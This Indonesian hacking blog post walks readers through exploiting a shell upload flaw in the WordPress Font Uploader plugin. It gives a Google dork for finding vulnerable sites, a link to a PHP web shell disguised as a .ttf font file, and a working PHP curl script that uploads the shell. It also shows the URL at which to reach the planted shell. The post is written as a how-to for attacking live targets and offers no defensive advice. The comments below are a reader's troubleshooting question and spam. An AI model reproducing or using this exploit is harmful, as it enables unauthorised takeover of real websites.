» » WordPress Plugins Font Uploader Shell Upload Vulnerability

WordPress Plugins Font Uploader Shell Upload Vulnerability

“Wordpress Font Uploader Shell Upload Vulnerability”, bisa diartikan sebagai celah upload shell pada plugins Font Uploader di CMS wordpress. Dengan memanfaatkan fungsi upload pada plugins tersebut, bisa dimanfaatkan seorang attacker untuk mengupload shell dengan teknik exploitasi.
Gak usah panjang lebar, coba dipraktekkan aja nanti disimpulkan sendiri. Hehehe.
Vulnerability Apps: http://downloads.wordpress.org/plugin/font-uploader.1.2.4.zip
Siapkan peralatannya dulu gan.

XAMPP : http://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.1/


Shell .ttf : http://www.mediafire.com/view/mkyudymc113p8ub/lo.php.ttf
Dork : inurl:/wp-content/plugins/font-uploader/
Pertama, masukkan dorknya ke google untuk mencari target.

Cari file font-upload.php pada folder wp-content/plugins/font-uploader/font-upload.php seperti dibawah ini. Kalau ada, berarti vuln.
Salin script exploit dibawah ini ke notepad
<?php
$uploadfile="lo.php.ttf";
$ch =
curl_init("http://server/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Ganti url target diatas dengan url web yang vuln.

Save dengan nama hack.php

Sekarang copy file shell (lo.php.ttf) dan hack.php ke c:/xampp/php seperti gambar dibawah ini.
 Klik Start , All Programs, Accessories, klik Command Promt.
Kemudian muncul jendela command promt seperti dibawah ini. Lalu ketik perintah cd.. kemudian tekan enter.
 
Ketik lagi cd.. kemudian tekan enter
Sekarang ketik cd xampp kemudian tekan enter
Lalu ketik cd php kemudian tekan enter
Terakhir ketik php hack.php seperti gambar dibawah ini, kemudian tekan enter
Shell Access :
http://www.TARGET.com/wordpress/wp-content/plugins/font-uploader/fonts/lo.php.ttf
contoh seperti dibawah ini.


Hasilnya :

Content by : Muhammad Fuad Fachrudin
Anda baru saja membaca artikel yang berkategori Web Hacking dengan judul WordPress Plugins Font Uploader Shell Upload Vulnerability. Jika kamu suka, jangan lupa like dan bagikan keteman-temanmu ya... By : Indonesia Security Cyber
Ditulis oleh: Muhammad Fuad Fachrudin - Monday, October 7, 2013

3 komentar untuk "WordPress Plugins Font Uploader Shell Upload Vulnerability"

  1. UnknownOctober 30, 2013 at 10:40 PM

    sy sdh coba gan tapi pada saat buka sheel acces malah hanya terdownload, sheel gak muncul..solusinya dong gan

    ReplyDelete
  2. leena pearlJuly 7, 2020 at 9:35 PM

    Cyber criminals and cyber hackers can target firewalls, IDS, and access control to enter the network and thereby causing serious damage. cyber security training in hyderabad

    ReplyDelete
  3. leena pearlDecember 4, 2021 at 5:31 AM

    By doing a little research, one can see that the average jobs and salaries associated with a CCNA are worth the training it takes to become certified. CCNA Training in Pune

    ReplyDelete

Subscribe to: Post Comments (Atom)